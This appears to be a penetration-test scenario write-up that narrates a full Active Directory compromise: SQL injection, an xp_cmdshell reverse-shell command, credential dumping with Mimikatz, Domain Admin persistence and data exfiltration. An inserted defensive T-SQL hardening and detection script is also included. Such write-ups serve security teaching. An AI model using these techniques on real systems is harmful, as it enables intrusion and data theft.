# S1P1

**Scenario 1 - The Hidden Path to Domain Dominance**

**1. Initial Access:**

I began with a standard phishing attack, which led to compromising a single host within the corporate network. The host was domain-joined, and after successfully obtaining standard user credentials, I started my enumeration. During this phase, I ran common tools like `PowerView` and `BloodHound` to explore the domain environment.

There wasn't much of immediate value, but I noticed a running **SQL Server instance** on one of the machines. This piqued my interest, as SQL Server is a common place for misconfigurations or vulnerabilities to exist, especially when services like **SQL Server Authentication** are improperly configured.

**2. Discovering the MSSQL Injection Vulnerability:**

I decided to investigate the application that interacted with the SQL Server. It was a web application that had a search feature, and after inspecting its behavior, I noticed it was vulnerable to **SQL injection**. This was a blind injection, and while it didn’t initially leak sensitive data directly, I could tell it was interacting with the backend database in a way that could be exploited.

I spent some time exploiting this injection vulnerability to extract information about the database and its users. During my testing, I found a **Service Principal Name (SPN)** associated with a service account used by the MSSQL server—`MSSQLSvc/sqlserver.company.local`. This was an important lead because it meant that this service account could potentially have high privileges and be involved in domain operations.

**3. Exploiting SQL Server for RCE:**

Next, I found that the SQL Server instance was running with **elevated privileges**. It allowed for `xp_cmdshell`, a built-in extended stored procedure, which can execute arbitrary OS commands from within SQL Server. With this, I was able to gain **Remote Code Execution (RCE)** on the server itself.

Using the SQL injection, I injected commands to execute the `xp_cmdshell` procedure and ran the following command to spawn a reverse shell:

{% code fullWidth="false" %}

```sql
EXEC xp_cmdshell 'powershell -e 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';
```

{% endcode %}

This reverse shell connected back to my attacking machine, and I now had **SYSTEM-level access** to the server, with full control over the system running SQL Server.
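Added example, not part of the original write-up: a T-SQL hardening and audit script a defender would run on the SQL Server described above to check whether `xp_cmdshell` is enabled, turn it off, review who holds `sysadmin` (the web application's login should not), confirm which account the service runs as, and leave an Extended Events session in place that records any statement referencing `xp_cmdshell`. The session name `xp_cmdshell_watch` and the output file path are assumptions.

```sql
-- 1. Is xp_cmdshell currently enabled? value_in_use = 1 means yes.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. Disable it. 'show advanced options' must be on before
--    sp_configure will accept the xp_cmdshell option.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- 3. Who could re-enable it? Only sysadmin members can, so the login
--    used by the web application must not appear in this list.
SELECT m.name AS login_name, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 4. Which Windows account does the engine run as? A domain-privileged
--    account here is what turns RCE on the box into a domain problem.
SELECT servicename, service_account
FROM sys.dm_server_services;

-- 5. Record every completed statement whose text mentions xp_cmdshell,
--    with caller, host and application, so an attempt to re-enable or
--    invoke it leaves a trace. Session name and file path are assumptions.
CREATE EVENT SESSION xp_cmdshell_watch ON SERVER
ADD EVENT sqlserver.sql_statement_completed
(
    ACTION (sqlserver.client_app_name, sqlserver.client_hostname,
            sqlserver.username, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_cmdshell%')
)
ADD TARGET package0.event_file (SET filename = N'C:\Audit\xp_cmdshell_watch.xel')
WITH (STARTUP_STATE = ON);

ALTER EVENT SESSION xp_cmdshell_watch ON SERVER STATE = START;
```

Steps 1 and 3 are the quick checks to run first; a result of `1` in step 1 together with an application login in step 3 is exactly the condition the injection above exploited.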

**4. Privilege Escalation to Domain Admin:**

Now that I had RCE on the server, I explored the system further and found several credentials stored in memory and configuration files. Among these, I found **credentials for a highly privileged service account** used for SQL Server maintenance, which was part of the **domain administrators group**.

This account was configured with **delegation rights**, allowing it to impersonate higher-privileged users across the network. With this credential, I could access critical resources and escalate further.

**5. Accessing the Domain Controller and Full Compromise:**

Using the domain administrator credentials I obtained, I pivoted to the **domain controller**. I used tools like **Mimikatz** to dump the hashes and cleartext passwords for all domain accounts, including those of other administrators.

I then added my own account to the **Domain Admins** group, ensuring **persistent access** to the entire domain. With full control over the domain, I could access sensitive data across the network, perform lateral movement, and deploy persistence mechanisms.

**6. Exfiltration and Final Control:**

Now in full control of the domain, I exfiltrated sensitive data, including customer information and financial records. I also created additional backdoors to maintain access.

***

#### **Key Takeaways:**

* **MSSQL Injection**: A vulnerable SQL injection point in the web application allowed me to interact with the database and find the **Service Principal Name (SPN)** associated with SQL Server.
* **Remote Code Execution (RCE)**: By exploiting the `xp_cmdshell` feature of SQL Server, I gained **Remote Code Execution** on the server, providing SYSTEM access.
* **Privilege Escalation**: The compromised service account had elevated privileges and delegation rights, allowing me to impersonate domain admins and escalate to **full domain control**.
* **Domain Compromise**: Once I gained domain admin access, I had unrestricted access to all systems and sensitive data within the organization.
